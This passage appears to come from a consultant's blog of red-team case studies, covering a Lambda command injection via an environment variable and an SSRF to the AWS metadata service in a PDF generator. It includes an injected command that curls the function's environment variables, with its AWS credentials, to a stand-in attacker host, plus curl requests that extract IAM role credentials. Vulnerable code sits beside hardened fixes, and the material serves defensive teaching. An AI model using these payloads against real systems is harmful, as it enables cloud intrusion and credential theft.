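    if normalized not in ALLOWED_SCRIPTS:
        raise ValueError(
            f"VALIDATION_SCRIPT is not an approved script: {candidate!r}"
        )
    return normalized
```

With this in place, operations can still switch scripts through configuration, but a value carrying extra commands or an unexpected path fails closed instead of being executed.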

    Let's assume the vulnerable Python Lambda code looked something like this:

    # transaction_processor.py
    import os
    import subprocess
    import json
    
    def lambda_handler(event, context):
        # Retrieve the command prefix from environment variables
        # This is the critical vulnerability point
        command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
        
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Construct the full command. The vulnerability is that command_prefix
        # is treated as part of the shell command, not just a path.
        full_command = f"{command_prefix} --transaction-id {transaction_id}"
        
        print(f"Executing validation command: {full_command}")
        
        try:
            # DANGER: shell=True allows command injection via command_prefix
            result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

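    The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell. Note that transaction_id, which comes from the request body, is interpolated into the same shell string and is therefore exposed to the same risk.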

    💥 Exploitation Walkthrough

    Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

    Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

    # Step 1: Modify the Lambda's environment variable
    # The payload injects a new command using shell metacharacters (;)
    # It then uses curl to send the Lambda's environment variables to our listener.
    # The original script still runs first, which avoids immediate suspicion;
    # the injected commands then run after it.
    
    ATTACKER_SERVER="http://your-attacker-ip:8000"
    LAMBDA_NAME="TransactionProcessorLambda"
    
    aws lambda update-function-configuration \
        --function-name ${LAMBDA_NAME} \
        --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
    

    Let's break down that payload for VALIDATION_SCRIPT_PATH:

    '/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '
    • /usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
    • ;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
    • curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
      • curl -X POST: Initiates an HTTP POST request.
      • -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
      • ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
    • ; echo 'Injection successful': Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.

    After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

    # Step 2: Trigger the Lambda function (e.g., via API Gateway)
    # This would be a normal transaction request from a client application.
    
    API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
    
    curl -X POST -H "Content-Type: application/json" \
         -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' \
         ${API_GATEWAY_URL}
    

    On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

    This was a critical RCE. With these credentials, we could have:

    • Read, modified, or deleted transaction data from DynamoDB.
    • Accessed sensitive audit logs from S3.
    • Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
    • Deployed further malicious code or backdoors.

    The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.

    🛡 Defensive Hardening Blueprint

    Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

    Pros
    • Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
    • Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
    • Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
    • Minimal Code Change: The core logic remains similar, making it easier to implement.
    • Standard Practice: Aligns with secure coding guidelines for executing external processes.

    Cons
    • Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
    • Potential for Misconfiguration: If VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented.
    • Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
    • Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

    Beyond this specific code fix, a comprehensive hardening blueprint would also include:

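    • Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required, and hold CI/CD and deployment roles to the same standard. For instance, neither the execution role nor any role reachable from the pipeline should have lambda:UpdateFunctionConfiguration unless it genuinely needs it.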
    • Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
    • Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
    • Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
    • Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
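As a rough illustration of the SAST item above, the following sketch walks a Python file's syntax tree and reports calls that pass a literal shell=True. It is a toy check under stated assumptions (Python 3.9+ for ast.unparse, and the find_shell_true_calls helper is hypothetical); a dedicated scanner such as Bandit covers far more cases.

```python
import ast


def find_shell_true_calls(source: str):
    """Return (line, callee) pairs for calls that pass a literal shell=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            if (
                kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
            ):
                findings.append((node.lineno, ast.unparse(node.func)))
    return sorted(findings)


# Small sample to scan; line 1 of the string is the empty line after the quotes.
sample = '''
import subprocess
subprocess.run(cmd, shell=True)
subprocess.run(["ls", "-l"])
subprocess.Popen(cmd, shell=True)
'''
print(find_shell_true_calls(sample))
```

A check like this only sees literal shell=True keywords, so it misses values passed through variables or wrappers. It is best treated as a pipeline tripwire that prompts a human review, not as proof that code is safe.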
    📖 Lessons From the Field

    Here's how the Lambda code and environment variables should be configured:

    # transaction_processor_hardened.py
    import os
    import subprocess
    import json
    import shlex # For safe splitting of shell-like strings
    
    def lambda_handler(event, context):
        # Retrieve the script path and arguments separately
        # No longer a single 'command_prefix' that can be injected
        script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
        script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments
    
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Safely parse arguments using shlex.split() if they are expected to be shell-like
        # For truly fixed arguments, a simple list is better.
        # Here, we assume VALIDATION_ARGS might contain multiple arguments.
        try:
            script_args = shlex.split(script_args_str)
        except ValueError as e:
            print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
            script_args = ["/opt/validation_logic.py"] # Fallback to a safe default
    
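        # Construct the full command as a list of arguments
        # This is crucial: subprocess.run with a list does NOT invoke a shell.
        # str() guards against non-string IDs (e.g. numeric JSON values).
        command_list = [script_path] + script_args + ["--transaction-id", str(transaction_id)]
        
        # shlex.join (Python 3.8+) quotes each argument so the log line is unambiguous
        print(f"Executing validation command: {shlex.join(command_list)}")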
        
        try:
            # SAFE: shell=False (default) when passing a list of arguments
            result = subprocess.run(command_list, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    And the corresponding environment variables:

    # Hardened Environment Variables
    VALIDATION_SCRIPT="/usr/bin/python"
    VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script
    

    This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.
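If the arguments really are static, the "hardcode them" option can be sketched as follows. This is an illustrative variant, not the client's fix: BASE_COMMAND, TRANSACTION_ID_RE, the assumed ID format, and build_validation_command are hypothetical names. It also validates transaction_id, since a value starting with a hyphen could otherwise be read by the script as an extra option.

```python
import re

# Fixed interpreter and script: nothing here is read from configuration.
BASE_COMMAND = ["/usr/bin/python", "/opt/validation_logic.py"]

# Assumed ID format: letters, digits, underscores and hyphens, up to 64
# characters, and never starting with '-'.
TRANSACTION_ID_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_-]{0,63}")


def build_validation_command(transaction_id):
    """Return the argv list for the validator, rejecting malformed IDs."""
    if not isinstance(transaction_id, str) or not TRANSACTION_ID_RE.fullmatch(
        transaction_id
    ):
        raise ValueError("transaction_id has an unexpected format")
    return BASE_COMMAND + ["--transaction-id", transaction_id]
```

The returned list can be passed straight to subprocess.run() without shell=True, so neither configuration nor request data ever reaches a shell parser.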

    This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

    1. Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
    2. shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
    3. The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
    4. Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
    5. Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.
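Lessons 3 and 5 both come back to knowing which principals can change what a Lambda function runs. As a hedged sketch, the helper below scans an IAM policy document (as a parsed JSON dict) for Allow statements that grant lambda:UpdateFunctionConfiguration or lambda:UpdateFunctionCode, either directly or through a wildcard. The find_risky_statements name and the choice of actions are my assumptions, and the check ignores Conditions and Resource scoping, so treat hits as review candidates.

```python
from fnmatch import fnmatchcase

# Actions that let a principal change what a Lambda function executes.
RISKY_ACTIONS = {
    "lambda:updatefunctionconfiguration",
    "lambda:updatefunctioncode",
}


def _as_list(value):
    """IAM allows a single string or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def find_risky_statements(policy: dict):
    """Return Allow statements whose Action matches a risky action."""
    risky = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            pattern = action.lower()  # IAM action names are case-insensitive
            if any(fnmatchcase(name, pattern) for name in RISKY_ACTIONS):
                risky.append(stmt)
                break
    return risky
```

Running something like this over every role a pipeline can assume is a cheap way to spot the kind of chained permission that gave us our foothold.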

    This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

    ID: RTL-2026-001  ·  Cloud Security  ·  Severity: CRITICAL  ·  2026-05-23
    RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service
    Cloud Security ⚠ Critical
    2026-05-23 18:45
    🎯 Target & Threat Context

    Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

    The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

    The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

    The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

    🔓 Vulnerability & Attack Vector

    The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

    In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

    Developers often miss this vulnerability for several reasons:

    1. Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
    2. Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
    3. Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
    4. Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.
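The third point suggests what safe proxy behavior looks like: the destination comes only from the requested URL, and X-Forwarded-For is never more than a log field. The sketch below expresses that rule in Python for brevity (the real proxy was written in Go). The plan_outbound_request helper and the FORWARDABLE_HEADERS allowlist are hypothetical.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of headers a caller may set on the outbound fetch.
FORWARDABLE_HEADERS = {"user-agent", "referer"}


def plan_outbound_request(target_url: str, caller_headers: dict):
    """Return (url, headers, logged_xff) for the outbound fetch."""
    parts = urlsplit(target_url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("target_url must be an absolute http(s) URL")

    # The destination comes from target_url only; no header can change it.
    headers = {
        name: value
        for name, value in caller_headers.items()
        if name.lower() in FORWARDABLE_HEADERS
    }

    # X-Forwarded-For is kept purely as a value to write to the access log.
    logged_xff = next(
        (v for k, v in caller_headers.items() if k.lower() == "x-forwarded-for"),
        None,
    )
    return target_url, headers, logged_xff
```

With this shape, a caller-supplied X-Forwarded-For value can appear in logs but has no path into the request's destination or its outbound headers.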

    This attack vector maps to MITRE ATT&CK T1190 (Exploit Public-Facing Application), since it abuses a public-facing endpoint to reach internal resources, and T1552.005 (Unsecured Credentials: Cloud Instance Metadata API), since the objective is the credentials served by the instance metadata service.

    Feature | Vulnerable Configuration | Hardened Configuration
    pdf-gen-svc Input Validation (URL) | Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding is not directly applicable here; the issue is a general lack of validation). | Strictly whitelists allowed domains/IPs for sourceUrl. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
    pdf-gen-svc Input Validation (Headers) | Allows arbitrary customHeaders to be passed directly to the internal proxy. | Sanitizes or strictly whitelists allowed customHeaders. Blocks sensitive headers like Host, X-Forwarded-For, X-Real-IP, etc., from user control.
    Internal Proxy Behavior | Uses X-Forwarded-For for routing decisions or trusts it implicitly for target IP identification. | Ignores X-Forwarded-For for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
    AWS Instance Metadata Service (IMDS) | IMDSv1 enabled (no session token required). | IMDSv2 enforced (requires a session token, making SSRF significantly harder).
    Network Segmentation/Egress Filtering | pdf-gen-svc and internal proxy have broad egress rules, allowing connections to 169.254.169.254 and other internal IPs. | Strict egress rules (Security Groups, NACLs) prevent pdf-gen-svc and proxy from connecting to 169.254.169.254 or any unnecessary internal/external IPs.
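The "blocks all private IP ranges" entry in the table can be sketched with Python's standard ipaddress module. This is a minimal illustration, not the client's implementation: BLOCKED_NETWORKS and is_blocked_address are hypothetical names, the range list is a reasonable starting set and not an exhaustive one, and the check only handles literal IP addresses, so hostnames would need to be resolved first and the resolved address checked.

```python
import ipaddress

BLOCKED_NETWORKS = [
    ipaddress.ip_network(cidr)
    for cidr in (
        "10.0.0.0/8",      # RFC 1918
        "172.16.0.0/12",   # RFC 1918
        "192.168.0.0/16",  # RFC 1918
        "127.0.0.0/8",     # loopback
        "169.254.0.0/16",  # link-local, includes the metadata endpoint
        "::1/128",         # IPv6 loopback
        "fc00::/7",        # IPv6 unique local
        "fe80::/10",       # IPv6 link-local
    )
]


def is_blocked_address(address: str) -> bool:
    """Return True if the literal IP address falls in a blocked range."""
    ip = ipaddress.ip_address(address)  # raises ValueError for non-IP input
    # Unwrap IPv4-mapped IPv6 (e.g. ::ffff:169.254.169.254) before checking.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in network for network in BLOCKED_NETWORKS)
```

Comparing parsed addresses against networks avoids the pitfalls of string matching such as sourceUrl.includes('169.254'), which misses alternative encodings of the same address.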

    Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

    // pdf-gen-svc (Node.js)
    const express = require('express');
    const axios = require('axios'); // Or any HTTP client
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
        if (sourceUrl.includes('169.254')) {
            return res.status(400).send('Invalid source URL.');
        }
    
        try {
            // Forward request to internal proxy, including custom headers
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: customHeaders || {} // Directly passes customHeaders
            });
    
            // ... rest of PDF generation logic ...
            res.status(200).send('PDF generated successfully (content omitted for brevity).');
    
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And on the proxy side (conceptual Go code):

    // internal-proxy.corp (Go)
    package main
    
    import (
        "fmt"
        "io/ioutil"
        "log"
        "net/http"
    )
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != "POST" {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // ... parse requestBody ...
    
        // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
        targetHost := requestBody.TargetURL // Default
        if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
            // If X-Forwarded-For is present, use it as the target host/IP
            // This is a simplified example of a misconfiguration.
            // In reality, it might be used in conjunction with a specific internal routing logic.
            targetHost = "http://" + xff // Direct IP injection!
        }
    
        req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        for k, v := range requestBody.Headers {
            req.Header.Set(k, v) // Pass all custom headers
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    
    💥 Exploitation Walkthrough

    The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

    Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

    Step 1: Discovering IAM Role Names

    First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
         -H "Content-Type: application/json" \
         -d '{
               "sourceUrl": "http://example.com/some-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
               }
             }'
    

    The response (rendered in the PDF) contained a list of IAM role names, for example:

    
    pdf-gen-service-role
    internal-proxy-role
    

    Step 2: Retrieving Temporary IAM Credentials

    With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
         -H "Content-Type: application/json" \
         -d '{
               "sourceUrl": "http://example.com/another-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
               }
             }'
    

    The PDF generated by the service now contained the following highly sensitive information:

    
    {
      "Code": "Success",
      "LastUpdated": "2023-10-27T10:00:00Z",
      "Type": "AWS-HMAC",
      "AccessKeyId": "ASIAV...EXAMPLE",
      "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
      "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
      "Expiration": "2023-10-27T16:00:00Z"
    }
    

    Bingo! We had successfully retrieved temporary AWS credentials: an AccessKeyId, a SecretAccessKey, and a session token (the Token field). These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

    🛡 Defensive Hardening Blueprint

    Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

    1. Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
    2. Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
    3. Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
    4. Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.
    Fix | Pros | Cons
    Strict Input Validation (URL) | Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly. | Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
    Strict Input Validation (Headers) | Prevents header-based SSRF bypasses and other header injection attacks. | Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
    Network Segmentation & Egress Filtering | Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius. | Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
    Enforce IMDSv2 | Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token. | Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
    Least Privilege IAM Roles | Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials. | Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.
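For the "Enforce IMDSv2" row, a minimal sketch of flipping an existing instance to token-only metadata access might look like this. It assumes boto3 is available and that the caller passes in an EC2 client; the enforce_imdsv2 wrapper and the hop limit default of 1 are my assumptions. Workloads that reach the metadata service from inside containers typically need a higher hop limit, so test before rolling this out.

```python
def enforce_imdsv2(ec2_client, instance_id: str, hop_limit: int = 1):
    """Require session tokens (IMDSv2) for one instance's metadata service."""
    return ec2_client.modify_instance_metadata_options(
        InstanceId=instance_id,
        HttpTokens="required",  # reject token-less IMDSv1 requests
        HttpPutResponseHopLimit=hop_limit,
        HttpEndpoint="enabled",
    )


# Example usage (assumes AWS credentials are configured; the ID is a placeholder):
#   import boto3
#   enforce_imdsv2(boto3.client("ec2"), "i-0123456789abcdef0")
```

Once HttpTokens is set to "required", a plain GET relayed through an SSRF flaw no longer returns credentials, because the metadata service first expects a PUT request that obtains a session token.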
    📖 Lessons From the Field

    Here's how the pdf-gen-svc and the internal proxy should be hardened:

    // pdf-gen-svc (Node.js) - Hardened
    const express = require('express');
    const axios = require('axios');
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';
    
    // Function to validate URLs: http(s) only, and the host must be on the whitelist.
    // A strict whitelist also rejects raw IP literals (private, loopback, and
    // link-local addresses such as 169.254.169.254), because none of them are listed.
    const allowedDomains = ['example.com', 'cdn.example.com']; // Example whitelist
    
    function isValidUrl(url) {
        try {
            const parsedUrl = new URL(url);
    
            // Reject file:, gopher:, ftp: and any other non-web scheme
            if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
                return false;
            }
    
            // Anything not explicitly whitelisted is refused, including internal
            // hostnames that are not IP literals.
            // Note: a whitelisted domain could still resolve to an internal address
            // (DNS rebinding), so egress filtering remains necessary as a backstop.
            return allowedDomains.includes(parsedUrl.hostname);
        } catch {
            return false; // Unparseable input is never valid
        }
    }
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        if (!isValidUrl(sourceUrl)) {
            return res.status(400).send('Invalid or disallowed source URL.');
        }
    
        // Sanitize customHeaders: only allow explicitly whitelisted headers.
        // Header names are case-insensitive, so compare them in lower case.
        const allowedCustomHeaders = ['user-agent', 'referer']; // Example whitelist
        const sanitizedHeaders = {};
        if (customHeaders && typeof customHeaders === 'object') {
            for (const [headerName, value] of Object.entries(customHeaders)) {
                if (allowedCustomHeaders.includes(headerName.toLowerCase()) && typeof value === 'string') {
                    sanitizedHeaders[headerName] = value;
                }
            }
        }
    
        try {
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: sanitizedHeaders
            });
            res.status(200).send('PDF generated successfully.');
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And for the internal proxy (conceptual Go code - Hardened):

    // internal-proxy.corp (Go) - Hardened
    package main
    
    import (
        "encoding/json"
